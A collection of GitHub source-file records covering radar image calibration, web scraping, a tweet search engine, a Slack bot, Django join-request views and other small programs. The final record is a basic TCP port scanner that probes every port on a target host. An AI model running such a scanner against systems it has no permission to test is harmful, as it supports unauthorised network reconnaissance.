pixel_spacing=100, db=False, cleanup=False, unzip=False):\n '''main loop for generating calibration products. 
infolder can be a folder of .SAFE/zip files or a .SAFE/zip file'''\n    print('--------------------------------\\nRunning Extraction and Calibration over:{}'.format(infolder))\n    if shapefile:\n        wktstring = get_wkt_from_shapefile(shapefile)\n    if db:\n        print('output products will be generated in decibels.')\n    infolder = unzip_check(infolder, cleanup) # unzip if required\n    # determine if we need to walk the dir\n    if infolder is False or not os.path.exists(infolder):\n        raise Exception('must provide valid input path.')\n    if contains_valid_product(infolder, polarization):\n        # process the file\n        calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n    elif os.path.isdir(infolder):\n        #see if we can process any subfolders\n        for item in os.listdir(infolder):\n            folder_path = os.path.join(infolder, item)\n            subfolder = unzip_check(folder_path, cleanup)\n            if contains_valid_product(subfolder, polarization):\n                calibrate_file(subfolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup)\n\ndef unzip_check(path, cleanup):\n    '''checks the path to see if it's a valid zip file. If true, will unzip and return path to new folder.\n    if False, will return the path.'''\n    if path.lower().endswith('zip') and zipfile.is_zipfile(path):\n        # extract the file\n        filename = os.path.basename(path)\n        base = os.path.splitext(filename)[0] + '.SAFE'\n        folder = os.path.dirname(path)\n        output_path = os.path.join(folder, base)\n        if os.path.exists(output_path):\n            return output_path # don't extract if the folder already exists\n        print('extracting {}...'.format(filename))\n        with zipfile.ZipFile(path,\"r\") as zip_ref:\n            zip_ref.extractall(folder)\n        if cleanup:\n            os.remove(path)\n        return output_path\n    return path\n\ndef contains_valid_product(path, polarization):\n    '''checks to see if the given directory contains a valid .tiff GRD file with the optional polarization'''\n    if not os.path.isdir(path):\n        return False\n    meas_dir = os.path.join(path, 'measurement')\n    if 'measurement' not in os.listdir(path) or not os.path.isdir(meas_dir):\n        return False\n    regex = 's1.*-grd-.*.tiff'\n    if polarization:\n        regex = 's1.*-grd-{}-.*.tiff'.format(polarization.lower())\n    for fil in os.listdir(meas_dir):\n        print('checking {}'.format(fil))\n        if bool(re.search(regex, fil.lower())):\n            return True\n    return False\n\ndef get_wkt_from_shapefile(shapefile_path):\n    '''returns the wkt string from the input shapefile'''\n    if not os.path.exists(shapefile_path):\n        raise Exception(\"invalid shapefile path: {}\".format(shapefile_path))\n    c = fiona.open(shapefile_path)\n    collection = [ shapely.geometry.shape(item['geometry']) for item in c ]\n    return [j.wkt for j in collection][0]\n\ndef calibrate_file(infolder, outfolder, polarization, basename, wktstring, pixel_spacing, db, cleanup):\n    '''calibrate input product'''\n    print('--------------------------\\nCalibrating product: {}'.format(infolder))\n    if outfolder is False:\n        outfolder = os.path.join(os.getcwd(), 's1_preprocessed')\n    if not os.path.exists(outfolder):\n        os.makedirs(outfolder)\n    if polarization is False:\n        polarization = ['HH', 'HV', 'VH', 'VV']\n    else:\n        # validate only when a single polarization was requested; asserting before\n        # the False fallback would reject the default case\n        assert polarization in allowed_polarizations\n        polarization = [polarization]\n    if wktstring is False:\n        wktstring = 'POLYGON ((-94.3242680177268 -68.1554115901846,-94.4799907148995 -78.0386897518533,-133.488922458484 -75.1093782424761,-116.988045118527 -66.0302485803105,-94.3242680177268 -68.1554115901846))'\n\n    GPF.getDefaultInstance().getOperatorSpiRegistry().loadOperatorSpis()\n    HashMap = 
snappy.jpy.get_type('java.util.HashMap')\n gc.enable()\n\n # build folder paths\n folder = os.path.basename(infolder)\n for pol in polarization:\n\n if basename is False:\n print(\"folder: {}\".format(folder))\n basename = os.path.basename(folder).rstrip('.SAFE')\n calib = os.path.join(outfolder, '{}.{}.{}.calibrated'.format(basename, pol, pixel_spacing)) \n subset = os.path.join(outfolder, '{}.{}.{}.subset'.format(basename, pol, pixel_spacing))\n terrain = os.path.join(outfolder, '{}.{}.{}.corrected'.format(basename, pol, pixel_spacing))\n \n # read product\n sentinel_1 = ProductIO.readProduct(os.path.join(infolder, \"manifest.safe\")) \n\n ### CALIBRATION\n parameters = HashMap() \n parameters.put('outputSigmaBand', True) \n parameters.put('sourceBands', 'Intensity_' + pol) \n parameters.put('selectedPolarisations', pol) \n parameters.put('outputImageScaleInDb', db) \n print('Applying radiometric correction: {}'.format(calib))\n target_0 = GPF.createProduct(\"Calibration\", parameters, sentinel_1) \n ProductIO.writeProduct(target_0, calib, 'BEAM-DIMAP')\n \n ### SUBSET\n calibration = ProductIO.readProduct(calib + \".dim\") \n WKTReader = snappy.jpy.get_type('com.vividsolutions.jts.io.WKTReader') \n geom = WKTReader().read(wktstring)\n parameters = HashMap()\n parameters.put('geoRegion', geom)\n parameters.put('outputImageScaleInDb', db)\n print('Generating subset file: {}'.format(subset))\n target_1 = GPF.createProduct(\"Subset\", parameters, calibration)\n ProductIO.writeProduct(target_1, subset, 'BEAM-DIMAP')\n \n ### TERRAIN CORRECTION\n parameters = HashMap() \n parameters.put('demResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('imgResamplingMethod', 'NEAREST_NEIGHBOUR') \n parameters.put('demName', 'GETASSE30') \n parameters.put('pixelSpacingInMeter', pixel_spacing) \n parameters.put('sourceBands', 'Sigma0_' + pol)\n print('Applying terrain correction: {}'.format(terrain)) \n target_2 = GPF.createProduct(\"Terrain-Correction\", parameters, target_1) \n ProductIO.writeProduct(target_2, terrain, 'GeoTIFF')\n \n del target_0\n del target_1\n del target_2\n if cleanup is True:\n os.remove(calib + '.dim')\n os.remove(subset + '.dim')\n shutil.rmtree(subset + '.data')\n shutil.rmtree(calib + '.data')\n if cleanup:\n shutil.rmtree(infolder)\n\ndef parser():\n '''\n Construct a parser to parse arguments, returns the parser\n '''\n parse = argparse.ArgumentParser(description=\"Apply radiometric and terrain corrections\")\n parse.add_argument(\"--infolder\", required=True, default=False, help=\"input S1 GRD folder\")\n parse.add_argument(\"--outfolder\", required=False, default=False, help=\"output folder for calibrated products\")\n parse.add_argument(\"--polarization\", required=False, default='HH', choices=['HH','VV','VH','HV'], help=\"polarization to process.\")\n parse.add_argument(\"--basename\", required=False, default=False, help=\"base folder/filename to use for output products\")\n parse.add_argument(\"--wkt\", required=False, default=False, help=\"wkt polygon bounds\")\n parse.add_argument(\"--shapefile\", required=False, default=False, help=\"shapefile for bounds\")\n parse.add_argument(\"--pixel_spacing\", required=False, default=100, type=float, help=\"Pixel spacing in meters\")\n parse.add_argument(\"--in_decibels\", action=\"store_true\", help=\"output is scaled in decibels\")\n parse.add_argument(\"--unzip\", action=\"store_true\", help=\"will extract zipped files\")\n parse.add_argument(\"--cleanup\", action=\"store_true\", help=\"cleanup intermediate files\")\n 
return parse\n\nif __name__ == '__main__':\n    args = parser().parse_args()\n    main(infolder=args.infolder, outfolder=args.outfolder, polarization=args.polarization,\n         basename=args.basename, wktstring=args.wkt, shapefile=args.shapefile,\n         pixel_spacing=args.pixel_spacing, db=args.in_decibels, cleanup=args.cleanup, unzip=args.unzip)\n","repo_name":"jlinick/S1GRD_TS","sub_path":"calibrate.py","file_name":"calibrate.py","file_ext":"py","file_size_in_byte":8703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20294254065","text":"n, m = map(int, input().split())\r\nmemo = list(list(-1 for i in range(j+1)) for j in range(n+1))\r\nmemo[0][0] = 1\r\nmemo[1][0] = 1\r\nmemo[1][1] = 1\r\nfor i in range(2, n+1):\r\n    for j in range(0, i+1):\r\n        if j == 0 or j == i:\r\n            memo[i][j] = 1\r\n        else:\r\n            memo[i][j] = memo[i-1][j] + memo[i-1][j-1]\r\nprint(\"%d\" % (memo[n][m]))","repo_name":"SHL0915/BOJ_Problem_Solving","sub_path":"백준/Silver/2407. 조합/조합.py","file_name":"조합.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"15100792118","text":"from selenium import webdriver\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\n\nf = open(\"WomenShoesLinks_v1.0.1.txt\")\nline = f.readline()\nf.close()\n\noptions = Options()\noptions.headless = True\n\ndriver = webdriver.Chrome(options=options)\ndriver.get(line)\n\nstateCookieBanner = False #not closed\n\nwhile stateCookieBanner == False:\n    try:\n        # Wait for cookie message\n        close_icon = WebDriverWait(driver, 10).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n        close_icon.click()\n        # Wait for cookie message to disappear\n        WebDriverWait(driver, 10).until(ec.invisibility_of_element_located((By.XPATH, '//*[@id=\"cookie-notifcation-banner\"]/div/button[1]')))\n        stateCookieBanner = True\n        print(\"\\nCookie banner closed\\n\")\n    except Exception:\n        # no banner appeared (or it is already gone): stop retrying instead of looping forever\n        stateCookieBanner = True\n        print(\"\\nNo cookie banner found\\n\")\n\nfind_in_store_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH, '//*[@id=\"pdp-store-stock-checker-link\"]')))\nfind_in_store_btn.click()\n\nproduct_size_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR,'#pdp-store-stock-checker-app-container > div > aside > div > section > form > div.size-selector > ul > li:nth-child(1) > button')))\nproduct_size_btn.click()\n\nlocation_inp = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/div[2]/div/input')))\nlocation_inp.send_keys('London')\n\ncheck_availability_btn = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.XPATH,'//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/form/button')))\ncheck_availability_btn.click()\n\nclose_bag = WebDriverWait(driver, 20).until(ec.visibility_of_element_located((By.CSS_SELECTOR, '#pdp-store-stock-checker-app-container > div > aside > div > section > section.store-stock-checker__section.store-stock-checker__popup.store-stock-checker__popup--visible > div > button.reset-btn.icon-ui-close.store-stock-checker__popup-close')))\nclose_bag.click()\n\nlocation_list = 
driver.find_element_by_xpath('//*[@id=\"pdp-store-stock-checker-app-container\"]/div/aside/div/section/section[2]/ul')\nlocations = location_list.find_elements_by_tag_name('li')\nfor location in locations:\n    text = location.text\n    print(text)\n\n# \"w\" creates the file or truncates it; the old open(\"x\") + open(\"a\") pair\n# leaked a handle and raised FileExistsError on reruns\nf = open(\"ProductLocation.txt\", \"w\")\nfor location in locations:\n    text = location.text\n    f.write(text + \"\\n\\n\")\n    \nf.close()\n\ndriver.quit()\n\n\n\n","repo_name":"OmarSaidIbrahim/python-web-automatation-selenium","sub_path":"automata-versions/automatation_v1.0.1.py","file_name":"automatation_v1.0.1.py","file_ext":"py","file_size_in_byte":2735,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"38"}
+{"seq_id":"13467327116","text":"from index import Index\nfrom score import rank_tweets, CustomScorer, rank_tweets_diversity, Word2VecScorer\nfrom query import Query\nfrom pathlib import Path\nimport argparse\nimport csv\n\nDEFAULT_TWEETS = Path(__file__).parent.parent/'res'/'merge_tweets_wusers.json'\n\ndef parse_main_args():\n    parser = argparse.ArgumentParser()\n    group = parser.add_mutually_exclusive_group()\n    group.add_argument('-index', default=None, help='Path to load index .pickle file')\n    group.add_argument('-tweets', default=DEFAULT_TWEETS, help='Path to load json tweet data')\n    parser.add_argument('-K', type=int, default=20, help='Maximum ranking length')\n    parser.add_argument('-out', default=None, help='Path to output tsv query rankings')\n    rmethod = parser.add_mutually_exclusive_group()\n    rmethod.add_argument('-w2v', action='store_true', help='Use word2vec scoring')\n    rmethod.add_argument('-custom', action='store_true', help='Use custom scoring (use likes and retweets)')\n    rmethod.add_argument('-diversity', action='store_true', help='Use diversified output')\n    return parser.parse_args()\n\nif __name__ == '__main__':\n    args = parse_main_args()\n\n    if args.index is not None:\n        print('Loading index...')\n        index = Index.load(args.index)\n    else:\n        index = Index()\n        print('Loading tweet info into index...')\n        index.load_json_tweets(args.tweets)\n\n    stop = False\n    scorer = None\n    if args.w2v:\n        scorer = Word2VecScorer(index.tweets.values())\n    if args.custom:\n        scorer = CustomScorer(index)\n\n    ranker = rank_tweets if not args.diversity else rank_tweets_diversity\n\n    while not stop:\n        str_query = input('Write a query: ')\n        query = Query(str_query)\n        output = []\n        for i, tweet in enumerate(ranker(query, index, K=args.K, scorer=scorer)):\n            print(i+1, '.\\n', '-'*100)\n            print(str(tweet))\n            output.append(tweet)\n        if args.out is not None:\n            with open(args.out, 'at') as out_file:\n                tsv_writer = csv.writer(out_file, delimiter='\\t')\n                tsv_writer.writerow(['query', str_query])\n                for tweet in output:\n                    tsv_writer.writerow(tweet.row_data())\n","repo_name":"idraveUPF/information_retrieval_final_project","sub_path":"search-engine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"}
+{"seq_id":"20017477180","text":"from ._version import __version__ # noqa: F401\nfrom ._cli import Command, Argument # noqa: F401\nfrom ._precept import Precept # noqa: F401\nfrom ._tools import AutoNameEnum, is_windows # noqa: F401, F403\nfrom ._immutable import ImmutableProp, ImmutableDict, ImmutableMeta # noqa: F401, F403, E501\nfrom ._configs import ( # noqa: F401\n    ConfigProperty, Config, ConfigFormat, Nestable, config_factory\n)\nfrom ._executor import AsyncExecutor # noqa: 
F401\nfrom ._services import Service # noqa: F401\nfrom ._plugins import Plugin # noqa: F401\n\n\n__all__ = [\n '__version__',\n 'Command',\n 'Argument',\n 'Precept',\n 'ImmutableDict',\n 'ImmutableMeta',\n 'ImmutableProp',\n 'ConfigProperty',\n 'Config',\n 'ConfigFormat',\n 'Nestable',\n 'config_factory',\n 'AsyncExecutor',\n 'Service',\n 'Plugin',\n 'is_windows',\n 'AutoNameEnum'\n]\n","repo_name":"T4rk1n/precept","sub_path":"precept/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"31329540507","text":"import os\nimport time\nimport re\nimport slack\nimport network\nfrom dotenv import load_dotenv\n\n#load env variables\nload_dotenv()\n\n#setup RTM client\nslack_token = os.getenv(\"SLACK_BOT_TOKEN\")\nrtm_client = slack.RTMClient(token=slack_token)\nweb_client = slack.WebClient(slack_token)\nmendicant_id = web_client.api_call(\"auth.test\")[\"user_id\"]\nchannels = {} \n\n@slack.RTMClient.run_on(event='message')\ndef unpack_payload(**payload):\n \"\"\"\n executes bot command if teh command is known\n \"\"\"\n data = payload['data']\n \n if \"subtype\" in data:\n return\n\n web_client = payload['web_client']\n \n command_tokens = tokenize_command(data['text'])\n module = route_command(data, web_client)\n text = module(command_tokens)\n web_client.chat_postMessage(channel=data['channel'], text=text)\n\ndef route_command(data, webclient):\n channel = data['channel']\n\n switcher={\n channels['network']:network.handle_command \n }\n\n return switcher.get(channel, invalid_module)\n\ndef tokenize_command(command_string):\n\treturn command_string.split()\n\ndef invalid_module():\n return \"I'm sorry Reclaimer, I don't have subroutines for that module\"\nif __name__ == \"__main__\":\n convo_list = web_client.api_call(\"conversations.list\")\n channels = {channel['name']: channel['id'] for channel in convo_list['channels']}\n rtm_client.start()\n\n","repo_name":"PogopunkXIII/mendicant-bias","sub_path":"mendicant_bias.py","file_name":"mendicant_bias.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26047424162","text":"import pandas as pd\r\nfrom create_tfrecord import tfrecord\r\nimport os\r\nimport matplotlib.pyplot as plt\r\n\r\ndef label_transfer(dataset_dir):\r\n\r\n #convert label from 5 classes to 2 classes\r\n\r\n train_dir = os.path.join(dataset_dir, r\"labels\\train.csv\")\r\n test_dir = os.path.join(dataset_dir, r\"labels\\test.csv\")\r\n\r\n df_train = pd.read_csv(train_dir)\r\n df_test = pd.read_csv(test_dir)\r\n\r\n for index, row in df_train.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_train.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_train.loc[index, 'Retinopathy grade'] = 1\r\n\r\n for index, row in df_test.iterrows():\r\n if row['Retinopathy grade'] <= 1:\r\n df_test.loc[index, 'Retinopathy grade'] = 0\r\n else:\r\n df_test.loc[index, 'Retinopathy grade'] = 1\r\n df_train.to_csv(os.path.join(dataset_dir, r\"train_binary.csv\"), index=False)\r\n df_test.to_csv(os.path.join(dataset_dir, r\"test_binary.csv\"), index=False)\r\n return df_train, df_test\r\n\r\ndef EDA(data):\r\n\r\n #Visualize dataset distribution\r\n\r\n data = data['Retinopathy grade']\r\n data_value = data.value_counts()\r\n plt.bar(data_value.index, data_value)\r\n plt.xticks(data_value.index, data_value.index.values)\r\n plt.xlabel(\"labels\")\r\n 
plt.ylabel(\"Frequency\")\r\n plt.title('Distribution of diabetic retinopathy in test dataset')\r\n plt.show()\r\n\r\n# change dataset_dir to your own dir\r\ndataset_dir = \"E:\\idrid\\IDRID_dataset\"\r\n# convert 5 classification to 2 classification\r\ntrain_dataset, test_dataset = label_transfer(dataset_dir)\r\n# create tfrecord files\r\ntfrecord(train_dataset, test_dataset, dataset_dir)\r\n# visualized data distribution\r\nEDA(train_dataset)\r\nEDA(test_dataset)\r\n","repo_name":"ruizhecao96/DenseNet121_DR","sub_path":"input_pipeline/data_EDA.py","file_name":"data_EDA.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"32382059429","text":"#! /usr/bin/python3\nimport sys\n \nfor index, line in enumerate(sys.stdin):\n inp = line.split()\n if index == 0:\n numOfMachines = int(inp[0])\n nunOfItems = int(inp[1])\n elif index == 1:\n times = [int(i) for i in inp]\n else:\n time = sum(times) + max(times) * (nunOfItems - 1)\n print(time)\nexit(0)","repo_name":"zackeua/Kattis","sub_path":"sequentialmanufacturing/sequentialmanufacturing.py","file_name":"sequentialmanufacturing.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40911998474","text":"from bisect import bisect_left\r\nimport json\r\nimport time\r\nimport pickle\r\n\r\ndef create_dict_terms_termsid(terms):\r\n ret = {}\r\n i = 1\r\n for term in terms:\r\n ret[term] = i\r\n i += 1\r\n return ret\r\n\r\n\r\ndef parsing(file, terms):\r\n # term_id = create_dict_terms_termsid(terms)\r\n with open(file, 'r') as fd:\r\n data = json.load(fd)\r\n tuples = []\r\n for doc in data:\r\n body = doc['.K'] + doc['.W'] + doc['.T'] # Seul le contenu de .K .W et .T nous intéresse\r\n for word in body.split():\r\n if binary_search(terms, word) != -1: # On vérifie que le mot est bien un terme (il appartient à l'ensemble des terms)\r\n tuples.append((word, doc['.I']))\r\n return tuples\r\n\r\ndef create_posting_list(file, terms):\r\n begin = time.time()\r\n l = parsing(file, terms)\r\n print(\"Creating posting list\")\r\n l.sort()\r\n posting_list = {}\r\n a = {l[0][1]: 1}\r\n posting_list[l[0][0]] = a\r\n for i in range(1, len(l)):\r\n if l[i][0] == l[i - 1][0]:\r\n if l[i][1] == l[i - 1][1]:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] += 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = posting_list[l[i][0]]\r\n a[l[i][1]] = 1\r\n posting_list[l[i][0]] = a\r\n else:\r\n a = {l[i][1]: 1}\r\n posting_list[l[i][0]] = a\r\n with open('inverted_index', 'wb') as file:\r\n my_pickler = pickle.Pickler(file)\r\n my_pickler.dump(posting_list)\r\n end = time.time()\r\n print(\"Done in {} seconds\".format(end - begin))\r\n\r\ndef binary_search(a, x, lo=0, hi=None): # can't use a to specify default for hi\r\n hi = hi if hi is not None else len(a) # hi defaults to len(a)\r\n pos = bisect_left(a,x,lo,hi) # find insertion position\r\n return (pos if pos != hi and a[pos] == x else -1)\r\n","repo_name":"kasimansour/Search-engine","sub_path":"RI-cacm/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"34342219389","text":"import logging\nfrom datetime import datetime\n\nimport redis.exceptions\nfrom django.core.exceptions import PermissionDenied\nfrom django.db import transaction\nfrom django.http import Http404\nfrom 
django.utils.translation import gettext as _\nfrom drf_spectacular.utils import (\n OpenApiResponse,\n extend_schema,\n extend_schema_view,\n inline_serializer,\n)\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.exceptions import ValidationError\nfrom rest_framework.response import Response\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom backend.models import Membership, Site\nfrom backend.models.constants import Role\nfrom backend.models.join_request import JoinRequest, JoinRequestStatus\nfrom backend.serializers import fields\nfrom backend.serializers.join_request_serializers import JoinRequestDetailSerializer\nfrom backend.tasks.send_email_tasks import send_email_task\nfrom backend.views import doc_strings\nfrom backend.views.base_views import FVPermissionViewSetMixin, SiteContentViewSetMixin\nfrom backend.views.utils import get_site_url_from_appjson\n\n\n@extend_schema_view(\n list=extend_schema(\n description=_(\n \"A list of pending join requests associated with the specified site.\"\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_list,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403_site_access_denied),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n retrieve=extend_schema(\n description=_(\"Details about a specific join request.\"),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_detail,\n response=JoinRequestDetailSerializer,\n ),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n create=extend_schema(\n description=_(\"Create a join request.\"),\n responses={\n 201: OpenApiResponse(\n description=doc_strings.success_201,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404_missing_site),\n },\n ),\n destroy=extend_schema(\n description=_(\"Delete a join request.\"),\n responses={\n 204: OpenApiResponse(\n description=doc_strings.success_204_deleted,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n approve=extend_schema(\n description=_(\n \"Approve a join request, and create a corresponding site membership.\"\n ),\n request=inline_serializer(\n name=\"Join Request Approval\", fields={\"role\": fields.EnumField(enum=Role)}\n ),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n response=JoinRequestDetailSerializer,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n ignore=extend_schema(\n description=_(\"Ignore a join request.\"),\n request=inline_serializer(name=\"Join Request Ignore\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n reject=extend_schema(\n description=_(\"Reject a join request.\"),\n 
request=inline_serializer(name=\"Join Request Rejection\", fields={}),\n responses={\n 200: OpenApiResponse(\n description=doc_strings.success_200_edit,\n ),\n 400: OpenApiResponse(description=doc_strings.error_400_validation),\n 403: OpenApiResponse(description=doc_strings.error_403),\n 404: OpenApiResponse(description=doc_strings.error_404),\n },\n ),\n)\nclass JoinRequestViewSet(\n SiteContentViewSetMixin, FVPermissionViewSetMixin, ModelViewSet\n):\n \"\"\"\n API endpoint for managing join requests.\n \"\"\"\n\n serializer_class = JoinRequestDetailSerializer\n http_method_names = [\"get\", \"post\", \"delete\"]\n\n permission_type_map = {\n \"create\": \"add\",\n \"destroy\": \"delete\",\n \"list\": None,\n \"partial_update\": \"change\",\n \"retrieve\": \"view\",\n \"update\": \"change\",\n \"approve\": \"change\", # custom actions use change permission\n \"ignore\": \"change\",\n \"reject\": \"change\",\n }\n\n def get_queryset(self):\n site = self.get_validated_site()\n return JoinRequest.objects.filter(\n site__slug=site[0].slug, status=JoinRequestStatus.PENDING\n ).select_related(\n \"site\", \"site__language\", \"created_by\", \"last_modified_by\", \"user\"\n )\n\n def get_validated_site(self):\n site_slug = self.get_site_slug()\n site = Site.objects.filter(slug=site_slug)\n\n if len(site) == 0:\n raise Http404\n\n # Check permissions on the site first, skip if the action is create\n if self.action != \"create\":\n perm = Site.get_perm(\"view\")\n if self.request.user.has_perm(perm, site[0]):\n return site\n else:\n raise PermissionDenied\n else:\n return site\n\n @action(detail=True, methods=[\"post\"])\n def ignore(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.IGNORED, request.user\n )\n\n serializer = self.get_serializer(join_request)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n @action(detail=True, methods=[\"post\"])\n def reject(self, request, site_slug=None, pk=None):\n join_request = self.get_object()\n\n self.update_join_request_status(\n join_request, JoinRequestStatus.REJECTED, request.user\n )\n\n subject = (\n f\"Update on your request to join {join_request.site.title} on FirstVoices\"\n )\n message = (\n f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices. \"\n \"A community administrator has reviewed your request. At this time, your request to view private content \"\n \"has not been approved. The site may not be accepting members at this time.\\n\\n\"\n \"Your request may be re-reviewed at a later date.\\n\\n\"\n \"All decisions regarding requests to view private content are made solely by community-based language \"\n \"administrators.\\n\\n\"\n \"If you think this may be a technical error, you can contact FirstVoices staff at \"\n \"hello@firstvoices.com.\\n\\n\"\n )\n\n try:\n send_email_task.apply_async((subject, message, [join_request.user.email]))\n except redis.exceptions.ConnectionError as e:\n logger = logging.getLogger(__name__)\n logger.error(f\"Could not queue task. 
Error: {e}\")\n\n        serializer = self.get_serializer(join_request)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    @action(detail=True, methods=[\"post\"])\n    def approve(self, request, site_slug=None, pk=None):\n        if \"role\" not in request.data:\n            raise ValidationError({\"role\": [\"This field is required.\"]})\n\n        try:\n            role_value = request.data[\"role\"]\n            role = Role[role_value.upper()]\n        except KeyError:\n            raise ValidationError(\n                {\"role\": [\"value must be one of: \" + \", \".join(Role.names)]}\n            )\n\n        join_request = self.get_object()\n\n        has_membership = Membership.objects.filter(\n            site=join_request.site, user=join_request.user\n        ).first()\n        if has_membership:\n            raise ValidationError(\"User already has a membership on this site\")\n\n        with transaction.atomic():\n            Membership.objects.create(\n                user=join_request.user, site=join_request.site, role=role\n            )\n            self.update_join_request_status(\n                join_request, JoinRequestStatus.APPROVED, request.user\n            )\n\n        subject = f\"Welcome to the {join_request.site.title} FirstVoices site!\"\n        message = (\n            f\"Thank you for requesting to join the {join_request.site.title} site on FirstVoices.\\n\"\n            \"A community administrator has approved your request.\\n\\n\"\n            f\"You are now approved on the {join_request.site.title} site with the role: {role.label}\\n\"\n            \"\"\n        )\n        base_url = get_site_url_from_appjson(join_request.site)\n        if base_url:\n            message = (\n                message\n                + f\"Visit the {join_request.site.title} site here: {base_url}\\n\\n\"\n            )\n        else:\n            message = message + \"\\n\"\n\n        try:\n            send_email_task.apply_async((subject, message, [join_request.user.email]))\n        except redis.exceptions.ConnectionError as e:\n            logger = logging.getLogger(__name__)\n            logger.error(f\"Could not queue task. Error: {e}\")\n\n        serializer = self.get_serializer(join_request)\n        return Response(serializer.data, status=status.HTTP_200_OK)\n\n    def update_join_request_status(self, join_request, new_status, user):\n        # parameter renamed from `status` to avoid shadowing rest_framework's `status` module\n        join_request.status = new_status\n        join_request.last_modified_by = user\n        join_request.last_modified = datetime.now()\n        join_request.save()\n","repo_name":"First-Peoples-Cultural-Council/fv-be","sub_path":"firstvoices/backend/views/join_request_views.py","file_name":"join_request_views.py","file_ext":"py","file_size_in_byte":10337,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"38"}
+{"seq_id":"24962315974","text":"import socket\nimport pyfiglet\nimport sys\nfrom datetime import datetime\n\nascii_banner = pyfiglet.figlet_format(\"PORT SCANNER\")\nprint(ascii_banner)\n\n\nif len(sys.argv) == 2:\n    target = socket.gethostbyname(sys.argv[1])\nelse:\n    print(\"Invalid amount of arguments!\")\n    sys.exit() # without this, `target` is undefined below\n\nprint(\"-\" * 50)\nprint(f\"Scanning target: {target}\")\nprint(f\"Scanning target at: {str(datetime.now())}\")\nprint(\"-\" * 50)\n\ntry:\n    for port in range(1, 65536): # include port 65535\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        socket.setdefaulttimeout(1)\n\n        result = s.connect_ex((target, port))\n        if result == 0:\n            print(f\"Port {port} is open.\")\n        s.close()\nexcept KeyboardInterrupt:\n    print(\"\\nExiting program.\")\n    sys.exit()\nexcept socket.gaierror:\n    print(\"\\nHostname could not be resolved.\")\n    sys.exit()\nexcept socket.error:\n    print(\"\\nServer not responding.\")\n    sys.exit()\n","repo_name":"andref50/console-chat","sub_path":"utils/port_scanner.py","file_name":"port_scanner.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"}
